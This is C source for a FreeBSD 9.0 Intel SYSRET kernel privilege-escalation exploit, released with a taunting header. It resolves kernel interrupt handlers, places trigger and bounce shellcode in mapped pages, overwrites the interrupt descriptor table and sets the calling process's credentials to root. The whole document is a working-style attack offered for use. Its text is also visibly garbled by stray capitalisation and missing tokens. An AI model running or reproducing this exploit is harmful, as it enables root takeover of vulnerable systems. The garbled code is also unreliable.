/** FreeBSD 9.0 Intel Sysret Kernel Privilege escalation exploit * Author by Curcolhekerlink * * This exploit based on Open source project, I can make it open source too. Right? * * If you blaming me for open sourcing this exploit, you can fuck your mom. free of charge:) * * Credits to Kepedean Corp, Barisan sakit Hati, ora iso sepaying meneh hekerlink, * kismin Perogeremer Cyber team, Petboylittledick, 1337 curhat Crew and others at #MamaDedehEliteCurhatTeam * If your would like next private E Xploit leakage, just mention @MamahhDedeh * * Some people may feel harmed if we release this exploit:)) * * P.s:met ID UL Adha ya besok, saatnya potong leher dewa lo ... eh maksudnya potong sapisisasi:)) **/#include<stdio.h>#include<stdlib.h>#include<stdint.h>#include<unistd.h>#include<string.h>#include<sys/mman.h>#include<machine/cpufunc.h>#define_want_ucred#include<sys/proc.h>#include<machine/segments.h>#include<sys/param.h>#include<sys/linker.h>#defineTriggersize 20#defineBouncesize 18uintptr_t XDIVP, XDBGP, XBPTP, XOFLP, XBNDP, XILLP, Xdnap, Xfpusegmp, XTSSP, XMISSINGP, XSTKP, XPROTP, XPAGEP, Xfpup, XALIGNP, XMCHKP, XXMMP;structGate_descriptor *Sidt () {structRegion_descriptor IDT; ASM ("Sidt%0":"=m"(IDT)); return(structgate_descriptor*) Idt.rd_base;} U_long Matchsym (Char*symname) { structKld_sym_lookup Ksym; Ksym.version=sizeof(KSYM); Ksym.symname=Symname; if(Kldsym (0, Kldsym_lookup, &ksym) <0) {perror ("Kldsym"); Exit (1); } returnKsym.symvalue;}voidSetidt (structGate_descriptor *idt,intIDX, uintptr_t func,intTypintDplintist) { structGate_descriptor *IP; IP= IDT +idx; IP->gd_looffset =func; IP->gd_selector =Gsel (Gcode_sel, SEL_KPL); IP->gd_ist =ist; IP->gd_xx =0; IP->gd_type =Typ; IP->GD_DPL =DPL; IP->gd_p =1; IP->gd_hioffset = func>> -;}voidPayload () {printf ("[+] Woohoo!!! \ n"); Exit (0);}voidResetidt () {structThread *TD; structUcred *cred; structGate_descriptor *idt =Sidt (); Setidt (IDT, Idt_de, XDIVP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, idt_db, XDBGP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_BP, XBPTP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, idt_of, XOFLP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, Idt_br, XBNDP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, Idt_ud, XILLP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, idt_nm, Xdnap, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_FPUGP, Xfpusegmp, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, Idt_ts, XTSSP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_NP, XMISSINGP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_SS, XSTKP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_GP, XPROTP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_PF, Xpagep, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_MF, Xfpup, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, Idt_ac, XALIGNP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_MC, XMCHKP, Sdt_sysigt, SEL_KPL,0); Setidt (IDT, IDT_XF, XXMMP, Sdt_sysigt, SEL_KPL,0); ASM ("mov%%gs:0,%0":"=r"(TD)); Cred= td->td_proc->p_ucred; Cred->cr_uid = Cred->cr_ruid = Cred->cr_rgid =0; Cred->cr_groups[0] =0; ASM ("Swapgs; sysretq;"::"C"(payload));}voidresolving () {XDIVP= (uintptr_t) matchsym ("Xdiv"); XDBGP= (uintptr_t) matchsym ("xdbg"); XBPTP= (uintptr_t) matchsym ("xbpt"); XOFLP= (uintptr_t) matchsym ("XOFL"); XBNDP= (uintptr_t) matchsym ("xbnd"); XILLP= (uintptr_t) matchsym ("Xill"); Xdnap= (uintptr_t) matchsym ("Xdna"); Xfpusegmp= (uintptr_t) matchsym ("Xfpusegm"); XTSSP= (uintptr_t) matchsym ("XTSS"); XMISSINGP= (uintptr_t) matchsym ("xmissing"); XSTKP= (uintptr_t) matchsym ("XSTK"); XPROTP= (uintptr_t) matchsym ("Xprot"); XPAGEP= (uintptr_t) matchsym ("Xpage"); Xfpup= (uintptr_t) matchsym ("XFPU"); XALIGNP= (uintptr_t) matchsym ("xalign"); XMCHKP= (uintptr_t) matchsym ("Xmchk"); XXMMP= (uintptr_t) matchsym ("XXMM");}voidtrigger () {printf ("[+] crotz...\n"); uint64_t pagesize=getpagesize (); uint8_t* Mappedarea = (uint8_t*) (1ULL << -) -pagesize); Mappedarea= Mmap (Mappedarea, pagesize, Prot_read | Prot_write | Prot_exec, map_fixed | Map_anon | Map_private,-1,0); if(Mappedarea = =map_failed) {Perror ("mmap (Trigger)"); Exit (1); } CharTriggerpayload[] ="\xb8\x18\x00\x00\x00" "\x48\x89\xe3" "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde" "\x0f\x05"; uint8_t* offset_addr = Mappedarea + pagesize-triggersize; memcpy (Offset_addr, Triggerpayload, triggersize); * (uint64_t*) (Offset_addr +Ten) = (uint64_t) (((uint8_t*) &sidt () [ -]) +Ten*8); printf ("[+] crotz...\n"); CharBouncepayload[] ="\x0f\x01\xf8" "\x48\x89\xdc" "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde" "\xff\xe0"; uint8_t* Bouncer = (uint8_t*) (0x900000000| (Xpagep &0xFFFFFFFF)); size_t bouncer_allocsize=pagesize; if((uint8_t*) ((uint64_t) Bouncer & ~ (pagesize-1)) + PageSize < bouncer +bouncesize) Bouncer_allocsize+=pagesize; if(Mmap (void*) ((uint64_t) Bouncer & ~ (pagesize-1)), Bouncer_allocsize, Prot_read | Prot_write | Prot_exec, map_fixed | Map_anon | Map_private,-1,0) ==map_failed) {Perror ("mmap (Bouncer)"); Exit (1); } memcpy (Bouncer, Bouncepayload, bouncesize); * (uint64_t*) (Bouncer +8) =(uint64_t) Resetidt; ((void(*) ()) offset_addr) ();}intMainintargcChar*argv[]) {printf ("[+] Sysret fuckup!! \ n"); printf ("[+] Start engine...\n"); Resolving (); printf ("[+] crotz...\n"); Trigger (); return 0;}
FreeBSD Intel sysret Kernel Privilege escalation Exploit